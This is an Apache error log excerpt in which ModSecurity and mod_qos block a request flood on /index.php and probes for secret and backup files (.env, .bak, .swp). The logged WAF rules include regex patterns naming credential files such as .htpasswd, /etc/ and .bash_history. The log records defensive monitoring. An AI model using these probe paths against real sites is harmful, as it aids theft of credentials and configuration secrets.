[Tue May 26 19:53:41.408786 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq9gAAAJk"]
[Tue May 26 19:53:41.415855 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKSwAAAG8"]
[Tue May 26 19:53:41.417680 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6Kq6QAAAOg"]
[Tue May 26 19:53:41.420441 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrDQAAAJY"]
[Tue May 26 19:53:41.427292 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKUgAAAHE"]
[Tue May 26 19:53:41.431828 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrAAAAANs"]
[Tue May 26 19:53:41.445972 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKWQAAAHY"]
[Tue May 26 19:53:41.447906 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrDgAAAKY"]
[Tue May 26 19:53:41.450344 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKUQAAADI"]
[Tue May 26 19:53:41.451111 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/includes/.env"] [unique_id "ahWs7VZMwN0DpLVWo6KrOAAAAKY"]
[Tue May 26 19:53:41.618736 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cache/.env"] [unique_id "ahWs7VZMwN0DpLVWo6KragAAAMg"]
[Tue May 26 19:53:41.651864 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7UqK9k_ZUB2Vp25EYAAAAZs
[Tue May 26 19:53:41.661749 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKkQAAACI
[Tue May 26 19:53:41.673543 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKkgAAAD4
[Tue May 26 19:53:41.678597 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKkwAAACo
[Tue May 26 19:53:41.679344 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKlAAAACo
[Tue May 26 19:53:41.692264 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKlQAAADY
[Tue May 26 19:53:41.696989 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrdwAAAMQ
[Tue May 26 19:53:41.700100 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKlgAAABg
[Tue May 26 19:53:41.736003 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKlwAAADk
[Tue May 26 19:53:41.743868 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKmAAAADo
[Tue May 26 19:53:41.788951 2026] [security2:error] [pid 86490:tid 86744] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/test/main.bak"] [unique_id "ahWs7VZMwN0DpLVWo6KregAAAQE"]
[Tue May 26 19:53:41.907784 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKmQAAAEk
[Tue May 26 19:53:41.909309 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrfQAAAMo
[Tue May 26 19:53:41.923158 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKmgAAAEg
[Tue May 26 19:53:41.927352 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKmwAAAEo
[Tue May 26 19:53:41.927998 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKnAAAAEo
[Tue May 26 19:53:41.950915 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7VZMwN0DpLVWo6KrggAAAL0
[Tue May 26 19:53:41.951619 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKnQAAAFA
[Tue May 26 19:53:41.954092 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKngAAAFE
[Tue May 26 19:53:41.955094 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKoAAAAEY
[Tue May 26 19:53:41.955303 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7WDRMqfxdEDkoszKnwAAAEc
[Tue May 26 19:53:42.056461 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKoQAAACQ
[Tue May 26 19:53:42.061540 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KriQAAAIY
[Tue May 26 19:53:42.073284 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKogAAABs
[Tue May 26 19:53:42.077203 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKowAAABE
[Tue May 26 19:53:42.077902 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKpAAAABE
[Tue May 26 19:53:42.102857 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KrigAAAMo
[Tue May 26 19:53:42.103954 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKpQAAAE0
[Tue May 26 19:53:42.107054 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKpwAAABk
[Tue May 26 19:53:42.107060 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKpgAAAC0
[Tue May 26 19:53:42.108512 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKqAAAAC4
[Tue May 26 19:53:42.254840 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KrjwAAAPI
[Tue May 26 19:53:42.259451 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKqQAAAGM
[Tue May 26 19:53:42.260087 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKqgAAAGU
[Tue May 26 19:53:42.263960 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKqwAAAA4
[Tue May 26 19:53:42.279689 2026] [security2:error] [pid 86490:tid 86650] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrBwAAAKM"]
[Tue May 26 19:53:42.294567 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrCQAAAPA"]
[Tue May 26 19:53:42.310349 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KrFAAAAMU"]
[Tue May 26 19:53:42.310718 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKVAAAADM"]
[Tue May 26 19:53:42.320846 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKXAAAAHQ"]
[Tue May 26 19:53:42.336897 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKUAAAACk"]
[Tue May 26 19:53:42.336973 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKWgAAAHM"]
[Tue May 26 19:53:42.342349 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKZwAAAEI"]
[Tue May 26 19:53:42.343839 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKaAAAAEQ"]
[Tue May 26 19:53:42.346051 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKVwAAAAE"]
[Tue May 26 19:53:42.349106 2026] [security2:error] [pid 93576:tid 93831] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKWwAAAHc"]
[Tue May 26 19:53:42.354046 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKWAAAAHU"]
[Tue May 26 19:53:42.354098 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKbAAAAAA"]
[Tue May 26 19:53:42.356829 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKaQAAAEU"]
[Tue May 26 19:53:42.358402 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKVgAAADQ"]
[Tue May 26 19:53:42.371919 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7WDRMqfxdEDkoszKegAAACs"]
[Tue May 26 19:53:42.372385 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKXQAAAHg"]
[Tue May 26 19:53:42.377141 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKagAAAFM"]
[Tue May 26 19:53:42.381071 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7UqK9k_ZUB2Vp25EVwAAAY8"]
[Tue May 26 19:53:42.383380 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKXwAAAHs"]
[Tue May 26 19:53:42.389820 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7WDRMqfxdEDkoszKcwAAAA0"]
[Tue May 26 19:53:42.403230 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKbQAAAFY"]
[Tue May 26 19:53:42.406126 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKXgAAAHo"]
[Tue May 26 19:53:42.437135 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKawAAAAI"]
[Tue May 26 19:53:42.441307 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrUgAAAJY"]
[Tue May 26 19:53:42.443997 2026] [security2:error] [pid 93867:tid 94032] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7ZCDfrjqoHpuuBKqxgAAARw"]
[Tue May 26 19:53:42.447762 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrUQAAALI"]
[Tue May 26 19:53:42.455712 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrUwAAAKg"]
[Tue May 26 19:53:42.459714 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7UqK9k_ZUB2Vp25EWgAAAZQ"]
[Tue May 26 19:53:42.462780 2026] [security2:error] [pid 86490:tid 86629] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7VZMwN0DpLVWo6KrNwAAAI4"]
[Tue May 26 19:53:42.473592 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/search.php.swp"] [unique_id "ahWs7lZMwN0DpLVWo6KrnwAAAJU"]
[Tue May 26 19:53:42.619794 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7lZMwN0DpLVWo6KrxgAAAKg
[Tue May 26 19:53:42.620862 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7lZMwN0DpLVWo6KryQAAALI
[Tue May 26 19:53:42.627179 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KrygAAANg
[Tue May 26 19:53:42.628359 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs7lZMwN0DpLVWo6KrywAAAI4
[Tue May 26 19:53:42.640577 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KrzgAAAKU
[Tue May 26 19:53:42.641116 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6KrzQAAAJU
[Tue May 26 19:53:42.641524 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7mDRMqfxdEDkoszKwwAAACI
[Tue May 26 19:53:42.643740 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs7lZMwN0DpLVWo6Kr0AAAAQI
